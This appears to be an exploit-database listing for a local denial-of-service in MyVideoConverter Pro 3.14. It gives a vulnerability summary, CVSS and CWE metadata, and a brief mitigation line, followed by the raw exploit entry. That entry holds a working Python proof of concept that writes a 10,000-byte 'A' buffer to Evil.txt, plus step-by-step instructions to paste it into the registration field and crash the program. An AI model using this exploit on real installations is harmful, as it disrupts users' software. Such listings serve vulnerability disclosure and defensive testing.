MyVideoConverter Pro 3.14 Denial of Service

vendor:

MyVideoConverter Pro

by:

Achilles

7.5

CVSS

HIGH

Denial of Service (DoS) Local Buffer Overflow

119

CWE

Product Name: MyVideoConverter Pro

Affected Version From: 3.14

Affected Version To: 3.14

Patch Exists: NO

Related CWE:

CPE: a:myvideoconverter_pro:myvideoconverter_pro:3.14

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x64

2019

MyVideoConverter Pro 3.14 Denial of Service

The exploit creates a malicious payload that causes a Denial of Service (DoS) by generating a local buffer overflow. The payload is written to a file called 'Evil.txt', which is then copied and pasted into the 'Copy and Paste Registration Code' field in the MyVideoConverter Pro software. When the user clicks 'ok', the software crashes.

Mitigation:

The vendor should release a patch to fix the buffer overflow vulnerability. Users should update to the latest version of the software to protect against this exploit.

Source

Exploit-DB raw data:

# Exploit Title: MyVideoConverter Pro 3.14 Denial of Service
# Date: 03.02.2019
# Vendor Homepage: http://www.ivideogo.com/
# Software Link :  http://www.ivideogo.com/
# Exploit Author: Achilles
# Tested Version: 3.14
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
 
# Steps to Produce the Crash: 
# 1.- Run python code : MyVideoConverter_Pro.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open MyVideoConverter Pro
# 4.- Paste the content of EVIL.txt into the field: 'Copy and Paste Registration Code'
# 5.- Click ok
# 5.- And you will see a crash.

#!/usr/bin/env python

buffer = "\x41" * 10000

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"